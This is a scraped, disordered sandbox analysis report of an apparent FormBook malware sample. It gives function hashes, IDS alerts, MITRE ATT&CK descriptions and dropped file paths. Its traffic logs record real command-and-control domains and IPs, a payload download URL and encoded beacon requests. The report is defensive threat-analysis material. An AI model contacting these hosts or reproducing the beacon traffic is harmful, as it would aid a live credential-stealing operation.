
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 9030522d6b55eea93c88058072f9fe1b2e15757253bbbbcaaad6f817a0ac5ab7
Instruction ID: 23b853c68e46f84b0760ff5a9207cd61c6060a63c17a44cdf8323f786be764c2
Opcode Fuzzy Hash: 9030522d6b55eea93c88058072f9fe1b2e15757253bbbbcaaad6f817a0ac5ab7
Instruction Fuzzy Hash: B5318276A002299FDB60DE28DC44BFEB7F8FF44650F850556E849E3240EB30AA558BA0

Function 04FF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04FF7E8B

Strings

+, xrefs: 04FF7DE8
-, xrefs: 04FF7DDD

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: dec5cec7a909109e923c6debe2dc86d572f7d0540f13fbf9819c77c2112635c9
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 5D91B571E002169BDB24EE69CC80ABEF7E5FF44760F54451AEA65E72E0E730B9438760

Function 04FB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04FB9175
$, xrefs: 04FB9191

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: aae917ed819ad435a11ac778223dd26765ddc48cedf682167569b77d879def5f
Instruction ID: 21b80c3af28d2d03d0448d7e1aa848a53edb4680b9a38e798d50877bd0c3bb5d
Opcode Fuzzy Hash: aae917ed819ad435a11ac778223dd26765ddc48cedf682167569b77d879def5f
Instruction Fuzzy Hash: A7813BB5D002699BDB31CF55CC45BEEB7B4AF08714F0441EAAA09B7280E7706E81CFA5

Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then xor eax, eax	6_2_030B9EF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then pop edi	6_2_030BE52E
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_052D04EF

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49844 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49850 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49865 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49856 -> 172.67.145.234:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /po.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ectasia.sa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Source: global traffic	HTTP traffic detected: GET /4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.vayui.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0

Source: global traffic	DNS traffic detected: DNS query: ectasia.sa.com
Source: global traffic	DNS traffic detected: DNS query: www.officinadelpasso.shop
Source: global traffic	DNS traffic detected: DNS query: www.vayui.top
Source: global traffic	DNS traffic detected: DNS query: www.tals.xyz

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZAMOWIEN.BAT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\k8457414

C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nswC99.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Circularness147.iag

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Isobronton.son

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Neurofysiolog.kno

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\archontate.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\foreaccounting.afn

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\panerende.ret

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Unliquefiable.Fla

C:\Users\user\overlbene.lnk

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
ZAMOWIEN.BAT.exe

Function 0040364B Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Function 00405D94 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148
filestringCOMMON

Function 00404108 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403D5A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 004030D5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 202
memoryCOMMON

Function 004066C5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 0040570D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00406A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 6E351817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00403484 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Function 004061A7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 0040337C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre